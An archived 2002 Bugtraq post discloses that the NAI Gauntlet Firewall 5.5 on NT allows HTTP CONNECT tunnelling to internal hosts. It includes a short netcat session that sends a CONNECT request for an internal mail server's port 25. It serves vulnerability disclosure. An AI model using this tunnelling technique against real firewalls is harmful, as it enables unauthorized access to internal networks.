NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)

From: Rashed Alabbar (rashed.alabbar@datafort.net)
Date: 02/28/02


From: "Rashed Alabbar" <rashed.alabbar@datafort.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 28 Feb 2002 18:33:26 +0400

Hi all,

    I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, it worked.

I don't know if this was published earlier or not, but here it goes:

Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)

Examples: (I'm using Volker Tanger [volker.tanger@discon.de]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)

Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z

nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0

HTTP/1.0 200 OK

mail server banner

That's it!

Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email: rashed.alabbar@datafort.net
http://www.datafort.net
_______________________________________________
The preceding E-mail message contains information that is confidential,
may be protected by the attorney-client or other applicable privileges,
and may constitute non-public information, which is intended to be
conveyed only to the designated recipients (s). If you are not an
intended recipient of this message, please notify the sender at (+9714)
391 3040 or via same e-mail. Unauthorized use, dissemination,
distribution, or reproduction of this message is strictly prohibited and
may be unlawful. Internet communications cannot be guaranteed to be
secured or error-free as information could be intercepted, corrupted,
lost, arrive late or contain viruses. The sender therefore does not
accept liability for any errors or omissions in the context of this
message which arise as a result of Internet transmission.



Relevant Pages

  • [NT] Vulnerability in Microsoft Agent Allows Code Execution (MS07-051)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... A remote code execution vulnerability exists in Microsoft Agent in the way ... Internet Explorer by setting the kill bit for the control in the registry. ...
    (Securiteam)
  • [NT] Vulnerability in OLE Automation Allows Code Execution
    ... Get your security news from a reliable source. ... This critical security update resolves a privately reported vulnerability. ... compromised Web sites and advertisement servers could contain specially ... mode sets the security level for the Internet zone to High. ...
    (Securiteam)
  • [NT] Vulnerability in the Indexing Service Allows Remote Code Execution (MS05-003)
    ... Get your security news from a reliable source. ... A remote code execution vulnerability exists in the Indexing Service ... connected to the Internet have a minimal number of ports exposed. ...
    (Securiteam)
  • [NT] Vulnerability in Windows Explorer Allows Execution (MS06-057)
    ... Get your security news from a reliable source. ... A remote code execution vulnerability exists in Windows Shell due to ... Prevent the WebViewFolderIcon ActiveX object from running in Internet ... Web sites that use the WebViewFolderIcon ActiveX ...
    (Securiteam)
  • [NT] Vulnerability in Windows Shell Allows Remote Code Execution (MS05-008)
    ... Get your security news from a reliable source. ... A privilege elevation vulnerability exists in Windows because of the way ... MS03-040 or a later Cumulative Security Update for Internet Explorer. ... Note Setting the level to High may cause some Web sites to work ...
    (Securiteam)